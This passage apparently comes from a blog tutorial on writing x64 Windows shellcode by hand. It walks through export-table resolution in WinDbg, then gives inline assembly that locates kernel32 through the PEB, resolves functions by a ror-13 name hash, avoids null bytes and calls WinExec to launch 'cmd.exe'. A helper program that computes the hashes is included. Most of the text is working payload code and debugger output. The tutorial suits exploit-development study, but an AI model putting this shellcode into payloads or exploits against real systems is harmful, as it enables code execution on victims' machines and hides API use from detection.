  00007ff8`96b9bbfc  0009e5cb 0009e620 0009e673 0009e6c8

  Each entry contains the relative address to the actual name of the function.

• Get name of the 7th function indexed(so index 6):

  0:000> da 7ff896b00000+9e281
  00007ff8`96b9e281  "AddConsoleAliasA"

• Get its ordinal index:

  0:002> dd 7ff896b00000+9d510
  00007ff8`96b9d510  00010000 00030002 00050004 00070006
  00007ff8`96b9d520  00090008 000b000a 000d000c 000f000e
  00007ff8`96b9d530  00110010 00130012 00150014 00170016
  00007ff8`96b9d540  00190018 001b001a 001d001c 001f001e
  00007ff8`96b9d550  00210020 00230022 00250024 00270026
  00007ff8`96b9d560  00290028 002b002a 002d002c 002f002e
  00007ff8`96b9d570  00310030 00330032 00350034 00370036
  00007ff8`96b9d580  00390038 003b003a 003d003c 003f003e

  Each entry is a WORD, so our index will still be 6.

• Get its address:

  0:000> dd 7ff896b00000+9a208
  00007ff8`96b9a208  0009e1f7 0009e22d 00020080 0001b700
  00007ff8`96b9a218  0005a140 000128f0 00025640 00025650
  00007ff8`96b9a228  0009e2b3 0003cce0 0005a280 0005a2e0
  00007ff8`96b9a238  00022270 0001e2c0 0003a620 000208a0
  00007ff8`96b9a248  0003a640 00038a40 0009e3ec 0009e42c
  00007ff8`96b9a258  00007200 00025290 0003a680 0003a660
  00007ff8`96b9a268  0009e4bf 0009e4fd 0009e545 0009e598
  00007ff8`96b9a278  0009e5f0 0009e644 0009e698 0009e6e3
  0:000> u 7ff896b00000+25640
  KERNEL32!AddConsoleAliasA:
  00007ff8`96b25640 ff2552c70500    jmp     qword ptr [KERNEL32!_imp_AddConsoleAliasA (00007ff8`96b81d98)]
  00007ff8`96b25646 cc              int     3
  00007ff8`96b25647 cc              int     3
  00007ff8`96b25648 cc              int     3
  00007ff8`96b25649 cc              int     3
  00007ff8`96b2564a cc              int     3
  00007ff8`96b2564b cc              int     3
  00007ff8`96b2564c cc              int     3

  Unassembling in WinDbg confirms that we have successfully resolved the function.

Summary

To summarise:

• Resolve base address of desired module using the PEB, Ldr and list structures.
• Locate that module’s Export Directory Table using its headers.
• Use the three arrays to resolve the function’s absolute address.

Now let’s start actually writing the shellcode.

Shellcoding

loader.c

#include <stdio.h>

#define DEBUG 1

int main(void)
{
	#if DEBUG
	getchar(); // windbg attach
	#endif

	__asm__
	(
		".intel_syntax noprefix;"

		// anything we write here will be intel assembly

		".att_syntax;"
	);

	return 0;
}

I’ll use this to easily debug the shellcode in WinDbg.

Resolve kernel32.dll Base

__asm__
(
	".intel_syntax noprefix;"

	"prologue:;"
		#if DEBUG
		"int 3;"
		#endif
		"mov rbp, rsp; "
		"add rsp, 0xfffffffffffff820;" // sub rsp, 0x7e0

	"find_kernel32:;"
		"xor rcx, rcx;"
		"mov rsi, qword ptr gs:[rcx+0x60];" // &PEB
		"mov rsi, qword ptr [rsi+0x18];" // PEB->Ldr
		"mov rsi, qword ptr [rsi+0x30];" // Ldr.InInitOrder

	"parse_next_module:;"
		"mov rbx, qword ptr [rsi+0x10];" // DllBase, -0x20 + 0x30 = 0x10
		"mov rdi, qword ptr [rsi+0x40];" // BaseDllName.Buffer
		"mov rsi, qword ptr [rsi];" // Flink
		"cmp word ptr [rdi+12*2], cx;" // check if 25th and 26th byte is 0
		"jne parse_next_module;"

	".att_syntax;"

Instead of performing a sub rsp, 0x7e0 to make space on the stack, we can add a huge number to overflow the 64-Bit number and achieve the same results.
This is to prevent null bytes that will arise when 0x7e0 is promoted to a 64-Bit number to be operated on a 64-Bit register.
Likewise we can use sub sp, 0x7e0.

In parse_next_module, we repeatedly check if the 25th and 26th byte of the module name are null.
This is because we want to find kernel32.dll, which is 13 bytes including the terminating null.
However because the name is in unicode representation, each byte now becomes a word.
Hence we are checking for the terminating null at the end of the name.
(I think this is slightly sloppy, but oh well it works)

Let’s check the results in WinDbg. The base address should be stored in rbx

Breakpoint 0 hit
loader+0x158e:
00000000`0040158e b800000000      mov     eax,0
0:000> r rbx
rbx=00007ff896b00000
0:000> lm m kernel32
Browse full module list
start             end                 module name
00007ff8`96b00000 00007ff8`96bbe000   KERNEL32   (deferred)

Success!

Compute Hash

Instead of loading function names as strings and comparing them in assembly to locate desired functions, it will be much easier if we hash the function names into 64-Bit numbers.

"compute_hash:;"
	"xor rax, rax;"
	"cdq;" // zero rdx (since rax is 0)
	"cld;" // forward string operations
	
"compute_hash_loop:;"
	"lodsb;"
	"test al, al;" // end of string null
	"jz compute_hash_end;"
	"ror rdx, 0xd;"
	"add rdx, rax;"
	"jmp compute_hash_loop;"

"compute_hash_end:;" // just a label

I’ll use a simple algorithm that adds a byte from the string to a sum, then rotate the sum rightwards by 13 bits.
This small routine will be used by our shellcode to hash the names of functions in the AddressOfNames array.

Of course, we will need to calculate the hash for our desired function beforehand, so we can hardcode that for comparison.

compute_hash.c

#include <stdio.h>

int main(int argc, char* argv[])
{
	char* ptr = argv[1];
	unsigned long long hash;

	__asm__
	(
		".intel_syntax noprefix;"
		"mov rsi, %1;"

		"compute_hash:;"
			"xor rax, rax;"
			"cdq;" // zero rdx (since rax is 0)
			"cld;" // forward string operations

		"compute_hash_loop:;"
			"lodsb;"
			"test al, al;" // end of string null
			"jz compute_hash_end;"
			"ror rdx, 0xd;"
			"add rdx, rax;"
			"jmp compute_hash_loop;"

		"compute_hash_end:;"
			"mov %0, rdx;"

		".att_syntax;"
		: "=r" (hash)
		: "r" (ptr)
	);

	printf("0x%llx\n", hash);
	return 0;
}

Now we can move on to code the actual function lookup routine.

Find Function

"find_function_jmp:;"
	"jmp find_function_callback;"

"find_function_ret:;"
	"pop r13;" // save return addr in r13, achieve position independence
	"jmp resolve_symbols;"

"find_function_callback:;"
	"call find_function_ret;" // negative callback avoid null, get ret addr

"find_function:;"
	"xor rax, rax;"
	"xor rdi, rdi;"
	"xor rcx, rcx;"
	"mov eax, dword ptr [rbx+0x3c];" // PE Header Offset
	"add rax, rbx;"
	"mov edi, dword ptr [rax+0x88];" // Export Dir Table relative addr
	"add rdi, rbx;" // EDT absolute addr
	"mov ecx, dword ptr [rdi+0x18];" // NumberOfNames
	"xor rax, rax;"
	"mov eax, dword ptr [rdi+0x20];" // AddressOfNames relative addr
	"add rax, rbx;" // AddressOfNames absolute addr
	"mov r14, rax;" // store addr
	
"find_function_loop:;"
	"jecxz find_function_finish;"
	"dec rcx;"
	"mov rax, r14;"
	"xor rsi, rsi;"
	"mov esi, dword ptr [rax+rcx*4];" // Name relative addr
	"add rsi, rbx;" // Name absolute addr

"compute_hash:;"
	"xor rax, rax;"
	"cdq;" // zero rdx (since rax is 0)
	"cld;" // forward string operations
	
"compute_hash_loop:;"
	"lodsb;"
	"test al, al;" // end of string null
	"jz compute_hash_end;"
	"ror rdx, 0xd;"
	"add rdx, rax;"
	"jmp compute_hash_loop;"

"compute_hash_end:;" // just a label

"find_function_compare:;"
	"cmp rdx, r15;" // r15 stores precalculated hash
	"jnz find_function_loop;"
	"xor rdx, rdx;"
	"mov edx, dword ptr [rdi+0x24];" // AddressOfNameOrdinals relative addr
	"add rdx, rbx;" // AddressOfNameOrdinals absolute addr
	"mov cx, word ptr [rdx+2*rcx];" // Ordinals index
	"mov edx, dword ptr [rdi+0x1c];" // AddressOfFunctions relative addr
	"add rdx, rbx;" // AddressOfFunctions absolute addr
	"mov eax, dword ptr [rdx+4*rcx];" // function relative addr
	"add rax, rbx;" // function absolute addr

"find_function_finish:;"
	"ret;"

The first few lines are responsible for achieving position independence.
By using a call instruction, the address of the first instruction of find_function is stored on the stack.
We can store it in r13, so our future calls to r13 will be NULL free.
The jmp before call is to ensure that no NULL bytes exist in our first call, since we are calling a negative offset.

Afterwards, find_function will retrieve the desired function address if found and return it.

Since we are writing our own assembly, we don’t have to care about calling conventions and I just chose to store the argument(hash) in r15.

Invoke Function

"resolve_symbols:;"
	"movabs r15, 0x84841e008a06e097;" // WinExec hash
	"call r13;" // find_function()
	"mov qword ptr [rbp+0x8], rax;" // save it somewhere

"call_winexec:;"
	"mov rax, 0x00006578652e646d63;" // string "cmd.exe"
	"push rax;"
	"mov rcx, rsp;"
	"xor rdx, rdx;"
	"inc rdx;"
	"and sp, 0xfff0;"
	"sub sp, 0x20;"
	"call qword ptr [rbp+0x8];"
".att_syntax;"

The final part is calling any desired function.
This is slightly tricky, because some functions have weird arguments(like empty structures) and we have to adjust the stack accordingly.

Since we used pure assembly, it is likely that we messed something up along the way and might cause a segfault in the API functions.
We’ll have to deal with that on a case by case basis with the help of WinDbg.

An example will be the WinExec call above. WinExec expects the stack to be 16 bytes aligned, or else one of its internal xmm related instruction will fail.

This post is getting long so I’m gonna stop.
Anyway, with some knowledge of windows internals and assembly we can make our own shellcode yay